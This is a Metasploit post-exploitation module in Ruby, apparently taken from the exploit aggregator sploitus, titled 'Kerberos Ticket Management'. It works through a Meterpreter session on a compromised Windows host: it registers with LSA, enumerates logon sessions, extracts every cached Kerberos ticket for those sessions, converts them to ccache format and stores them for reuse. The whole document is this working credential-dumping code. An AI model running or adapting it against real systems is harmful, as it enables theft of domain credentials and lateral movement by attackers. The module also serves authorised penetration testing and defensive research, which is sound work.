Share
## https://sploitus.com/exploit?id=MSF:POST-WINDOWS-MANAGE-KERBEROS_TICKETS-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/kerberos/model/kerberos_flags'
require 'rex/proto/kerberos/model/ticket_flags'
require 'rex/proto/ms_dtyp'
class MetasploitModule < Msf::Post
include Msf::Post::Process
include Msf::Post::Windows::Lsa
include Msf::Exploit::Remote::Kerberos::Ticket
CURRENT_PROCESS = -1
CURRENT_THREAD = -2
# https://learn.microsoft.com/en-us/windows/win32/api/ntsecapi/ne-ntsecapi-security_logon_type
SECURITY_LOGON_TYPE = {
0 => 'UndefinedLogonType',
2 => 'Interactive',
3 => 'Network',
4 => 'Batch',
5 => 'Service',
6 => 'Proxy',
7 => 'Unlock',
8 => 'NetworkCleartext',
9 => 'NewCredentials',
10 => 'RemoteInteractive',
11 => 'CachedInteractive',
12 => 'CachedRemoteInteractive',
13 => 'CachedUnlock'
}.freeze
# https://learn.microsoft.com/en-us/windows/win32/api/ntsecapi/ne-ntsecapi-kerb_protocol_message_type
KERB_RETRIEVE_ENCODED_TICKET_MESSAGE = 8
KERB_QUERY_TICKET_CACHE_EX_MESSAGE = 14
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Kerberos Ticket Management',
'Description' => %q{
Manage kerberos tickets on a compromised host.
},
'License' => MSF_LICENSE,
'Author' => [
'Will Schroeder', # original idea/research
'Spencer McIntyre'
],
'References' => [
[ 'URL', 'https://github.com/GhostPack/Rubeus' ],
[ 'URL', 'https://github.com/wavvs/nanorobeus' ]
],
'Platform' => ['win'],
'SessionTypes' => %w[meterpreter],
'Actions' => [
['DUMP_TICKETS', { 'Description' => 'Dump the Kerberos tickets' }],
['ENUM_LUIDS', { 'Description' => 'Enumerate session logon LUIDs' }],
['SHOW_LUID', { 'Description' => 'Show the current LUID' }],
],
'DefaultAction' => 'DUMP_TICKETS',
'Notes' => {
'Stability' => [],
'Reliability' => [],
'SideEffects' => []
},
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_net_resolve_host
stdapi_railgun_api
stdapi_railgun_memread
stdapi_railgun_memwrite
]
}
}
)
)
register_options([
OptString.new(
'LUID',
[false, 'An optional logon session LUID to target'],
conditions: [ 'ACTION', 'in', %w[SHOW_LUID DUMP_TICKETS]],
regex: /^(0x[a-fA-F0-9]{1,16})?$/
),
OptString.new(
'SERVICE',
[false, 'An optional service name wildcard to target (e.g. krbtgt/*)'],
conditions: %w[ACTION == DUMP_TICKETS]
)
])
end
def run
case session.native_arch
when ARCH_X64
@ptr_size = 8
when ARCH_X86
@ptr_size = 4
else
fail_with(Failure::NoTarget, "This module does not support #{session.native_arch} sessions.")
end
@hostname_cache = {}
@indent_level = 0
send("action_#{action.name.downcase}")
end
def action_dump_tickets
handle = lsa_register_logon_process
luids = nil
if handle
if target_luid
luids = [ target_luid ]
else
luids = lsa_enumerate_logon_sessions
print_error('Failed to enumerate logon sessions.') if luids.nil?
end
trusted = true
else
handle = lsa_connect_untrusted
# if we can't register a logon process then we can only act on the current LUID so skip enumeration
fail_with(Failure::Unknown, 'Failed to obtain a handle to LSA.') if handle.nil?
trusted = false
end
luids ||= [ get_current_luid ]
print_status("LSA Handle: 0x#{handle.to_s(16).rjust(@ptr_size * 2, '0')}")
auth_package = lsa_lookup_authentication_package(handle, 'kerberos')
if auth_package.nil?
lsa_deregister_logon_process(handle)
fail_with(Failure::Unknown, 'Failed to lookup the Kerberos authentication package.')
end
luids.each do |luid|
dump_for_luid(handle, auth_package, luid, null_luid: !trusted)
end
lsa_deregister_logon_process(handle)
end
def action_enum_luids
current_luid = get_current_luid
luids = lsa_enumerate_logon_sessions
fail_with(Failure::Unknown, 'Failed to enumerate logon sessions.') if luids.nil?
luids.each do |luid|
logon_session_data_ptr = lsa_get_logon_session_data(luid)
unless logon_session_data_ptr
print_status("LogonSession LUID: #{luid}")
next
end
print_logon_session_summary(logon_session_data_ptr, annotation: luid == current_luid ? '%bld(current)%clr' : '')
session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)
end
end
def action_show_luid
current_luid = get_current_luid
luid = target_luid || current_luid
logon_session_data_ptr = lsa_get_logon_session_data(luid)
return unless logon_session_data_ptr
print_logon_session_summary(logon_session_data_ptr, annotation: luid == current_luid ? '%bld(current)%clr' : '')
session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)
end
def dump_for_luid(handle, auth_package, luid, null_luid: false)
logon_session_data_ptr = lsa_get_logon_session_data(luid)
return unless logon_session_data_ptr
print_logon_session_summary(logon_session_data_ptr)
session.railgun.secur32.LsaFreeReturnBuffer(logon_session_data_ptr.value)
logon_session_data_ptr.contents.logon_id.clear if null_luid
query_tkt_cache_req = KERB_QUERY_TKT_CACHE_REQUEST.new(
message_type: KERB_QUERY_TICKET_CACHE_EX_MESSAGE,
logon_id: logon_session_data_ptr.contents.logon_id
)
query_tkt_cache_res_ptr = lsa_call_authentication_package(handle, auth_package, query_tkt_cache_req)
if query_tkt_cache_res_ptr
indented_print do
dump_session_tickets(handle, auth_package, logon_session_data_ptr, query_tkt_cache_res_ptr)
end
session.railgun.secur32.LsaFreeReturnBuffer(query_tkt_cache_res_ptr.value)
end
end
def dump_session_tickets(handle, auth_package, logon_session_data_ptr, query_tkt_cache_res_ptr)
case session.native_arch
when ARCH_X64
query_tkt_cache_response_klass = KERB_QUERY_TKT_CACHE_RESPONSE_x64
retrieve_tkt_request_klass = KERB_RETRIEVE_TKT_REQUEST_x64
retrieve_tkt_response_klass = KERB_RETRIEVE_TKT_RESPONSE_x64
when ARCH_X86
query_tkt_cache_response_klass = KERB_QUERY_TKT_CACHE_RESPONSE_x86
retrieve_tkt_request_klass = KERB_RETRIEVE_TKT_REQUEST_x86
retrieve_tkt_response_klass = KERB_RETRIEVE_TKT_RESPONSE_x86
end
tkt_cache = query_tkt_cache_response_klass.read(query_tkt_cache_res_ptr.contents)
tkt_cache.tickets.each_with_index do |ticket, index|
server_name = read_lsa_unicode_string(ticket.server_name)
if datastore['SERVICE'].present? && !File.fnmatch?(datastore['SERVICE'], server_name.split('@').first, File::FNM_CASEFOLD | File::FNM_DOTMATCH)
next
end
server_name_wz = session.railgun.util.str_to_uni_z(server_name)
print_status("Ticket[#{index}]")
indented_print do
retrieve_tkt_req = retrieve_tkt_request_klass.new(
message_type: KERB_RETRIEVE_ENCODED_TICKET_MESSAGE,
logon_id: logon_session_data_ptr.contents.logon_id, cache_options: 8
)
ptr = session.railgun.util.alloc_and_write_data(retrieve_tkt_req.to_binary_s + server_name_wz)
next if ptr.nil?
retrieve_tkt_req.target_name.len = server_name_wz.length - 2
retrieve_tkt_req.target_name.maximum_len = server_name_wz.length
retrieve_tkt_req.target_name.buffer = ptr + retrieve_tkt_req.num_bytes
session.railgun.memwrite(ptr, retrieve_tkt_req)
retrieve_tkt_res_ptr = lsa_call_authentication_package(handle, auth_package, ptr, submit_buffer_length: retrieve_tkt_req.num_bytes + server_name_wz.length)
session.railgun.util.free_data(ptr)
next if retrieve_tkt_res_ptr.nil?
retrieve_tkt_res = retrieve_tkt_response_klass.read(retrieve_tkt_res_ptr.contents)
if retrieve_tkt_res.ticket.encoded_ticket != 0
ticket = kirbi_to_ccache(session.railgun.memread(retrieve_tkt_res.ticket.encoded_ticket, retrieve_tkt_res.ticket.encoded_ticket_size))
ticket_host = ticket.credentials.first.server.components.last.snapshot
ticket_host = resolve_host(ticket_host) if ticket_host
Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(ticket.encode)
Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ticket, framework_module: self, host: ticket_host)
presenter = Rex::Proto::Kerberos::CredentialCache::Krb5CcachePresenter.new(ticket)
print_line(presenter.present.split("\n").map { |line| " #{print_prefix}#{line}" }.join("\n"))
end
session.railgun.secur32.LsaFreeReturnBuffer(retrieve_tkt_res_ptr.value)
end
end
end
def target_luid
return nil if datastore['LUID'].blank?
val = datastore['LUID'].to_i(16)
Rex::Proto::MsDtyp::MsDtypLuid.new(
high_part: (val & 0xffffffff) >> 32,
low_part: (val & 0xffffffff)
)
end
def kirbi_to_ccache(input)
krb_cred = Rex::Proto::Kerberos::Model::KrbCred.decode(input)
Msf::Exploit::Remote::Kerberos::TicketConverter.kirbi_to_ccache(krb_cred)
end
def get_current_luid
luid = get_token_statistics&.authentication_id
fail_with(Failure::Unknown, 'Failed to obtain the current LUID.') unless luid
luid
end
def get_token_statistics(token: nil)
if token.nil?
result = session.railgun.advapi32.OpenThreadToken(CURRENT_THREAD, session.railgun.const('TOKEN_QUERY'), false, @ptr_size)
unless result['return']
error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first
unless error == ::WindowsError::Win32::ERROR_NO_TOKEN
print_error("Failed to open the current thread token. OpenThreadToken failed with: #{error}")
return nil
end
result = session.railgun.advapi32.OpenProcessToken(CURRENT_PROCESS, session.railgun.const('TOKEN_QUERY'), @ptr_size)
unless result['return']
error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first
print_error("Failed to open the current process token. OpenProcessToken failed with: #{error}")
return nil
end
end
token = result['TokenHandle']
end
result = session.railgun.advapi32.GetTokenInformation(token, 10, TOKEN_STATISTICS.new.num_bytes, TOKEN_STATISTICS.new.num_bytes, @ptr_size)
unless result['return']
error = ::WindowsError::Win32.find_by_retval(result['GetLastError']).first
print_error("Failed to obtain the token information. GetTokenInformation failed with: #{error}")
return nil
end
TOKEN_STATISTICS.read(result['TokenInformation'])
end
def resolve_host(name)
name = name.dup.downcase # normalize the case since DNS is case insensitive
return @hostname_cache[name] if @hostname_cache.key?(name)
vprint_status("Resolving hostname: #{name}")
begin
address = session.net.resolve.resolve_host(name)[:ip]
rescue Rex::Post::Meterpreter::RequestError => e
elog("Unable to resolve #{name.inspect}", error: e)
end
@hostname_cache[name] = address
end
def print_logon_session_summary(logon_session_data_ptr, annotation: nil)
sid = '???'
if datastore['VERBOSE'] && logon_session_data_ptr.contents.psid != 0
# reading the SID requires 3 railgun calls so only do it in verbose mode to speed things up
# reading the data directly wouldn't be much faster because SIDs are of a variable length
result = session.railgun.advapi32.ConvertSidToStringSidA(logon_session_data_ptr.contents.psid.to_i, @ptr_size)
if result
sid = session.railgun.util.read_string(result['StringSid'])
session.railgun.kernel32.LocalFree(result['StringSid'])
end
end
print_status("LogonSession LUID: #{logon_session_data_ptr.contents.logon_id} #{annotation}")
indented_print do
print_status("User: #{read_lsa_unicode_string(logon_session_data_ptr.contents.logon_domain)}\\#{read_lsa_unicode_string(logon_session_data_ptr.contents.user_name)}")
print_status("UserSID: #{sid}") if datastore['VERBOSE']
print_status("Session: #{logon_session_data_ptr.contents.session}")
print_status("AuthenticationPackage: #{read_lsa_unicode_string(logon_session_data_ptr.contents.authentication_package)}")
print_status("LogonType: #{SECURITY_LOGON_TYPE.fetch(logon_session_data_ptr.contents.logon_type.to_i, '???')} (#{logon_session_data_ptr.contents.logon_type.to_i})")
print_status("LogonTime: #{logon_session_data_ptr.contents.logon_time.to_datetime.localtime}")
print_status("LogonServer: #{read_lsa_unicode_string(logon_session_data_ptr.contents.logon_server)}") if datastore['VERBOSE']
print_status("LogonServerDNSDomain: #{read_lsa_unicode_string(logon_session_data_ptr.contents.dns_domain_name)}") if datastore['VERBOSE']
print_status("UserPrincipalName: #{read_lsa_unicode_string(logon_session_data_ptr.contents.upn)}") if datastore['VERBOSE']
end
end
def peer
nil # drop the peer prefix from messages
end
def indented_print(&block)
@indent_level += 1
block.call
ensure
@indent_level -= 1
end
def print_prefix
super + (' ' * @indent_level.to_i * 2)
end
end